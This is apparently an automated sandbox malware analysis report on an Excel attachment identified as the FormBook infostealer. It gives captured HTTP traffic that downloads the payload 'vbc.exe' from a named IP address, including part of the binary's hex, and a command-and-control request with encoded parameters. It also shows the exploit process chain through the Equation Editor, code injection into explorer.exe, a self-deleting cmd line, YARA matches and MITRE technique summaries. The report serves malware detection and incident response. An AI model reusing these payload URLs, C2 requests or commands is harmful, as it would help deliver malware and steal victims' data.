Oct 13, 2021 19:03:15.651736975 CEST	0	OUT	GET /000900/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.110.172 Connection: Keep-Alive
Oct 13, 2021 19:03:15.826574087 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 17:03:16 GMT Server: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11 Last-Modified: Wed, 13 Oct 2021 06:08:09 GMT ETag: "46f39-5ce35c953b021" Accept-Ranges: bytes Content-Length: 290617 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF^QFQGqQF^QFrvQF.W@QFRichQFPELe:V\0p@tp\|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 19:04:58.731059074 CEST	305	OUT	GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1 User-Agent: Windows Explorer Host: www.washingtonboatrentals.com
Oct 13, 2021 19:04:58.749141932 CEST	305	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 13 Oct 2021 17:04:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 61 73 68 69 6e 67 74 6f 6e 62 6f 61 74 72 65 6e 74 61 6c 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 35 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 61 73 68 69 6e 67 74 6f 6e 62 6f 61 74 72 65 6e 74 61 6c 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>59 <meta http-equiv='refresh' content='5; url=http://www.washingtonboatrentals.com/' />a </head>9 <body>45 You are being redirected to http://www.washingtonboatrentals.coma </body>8</html>0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 284 Parent PID: 596

General

Start time:	19:02:29
Start date:	13/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fc40000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: EQNEDT32.EXE PID: 2540 Parent PID: 596

General

Start time:	19:02:51
Start date:	13/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 1292 Parent PID: 2540

General

Start time:	19:02:55
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	290617 bytes
MD5 hash:	0031A23B4BB6ABCDCCC5F8122DE5FCB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs
Reputation:	low

Analysis Process: vbc.exe PID: 2072 Parent PID: 1292

General

Start time:	19:02:58
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	290617 bytes
MD5 hash:	0031A23B4BB6ABCDCCC5F8122DE5FCB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 1764 Parent PID: 2072

General

Start time:	19:03:01
Start date:	13/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: netsh.exe PID: 1864 Parent PID: 1764

General

Start time:	19:03:25
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0x1640000
File size:	96256 bytes
MD5 hash:	784A50A6A09C25F011C3143DDD68E729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2544 Parent PID: 1864

General

Start time:	19:03:29
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x49f30000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre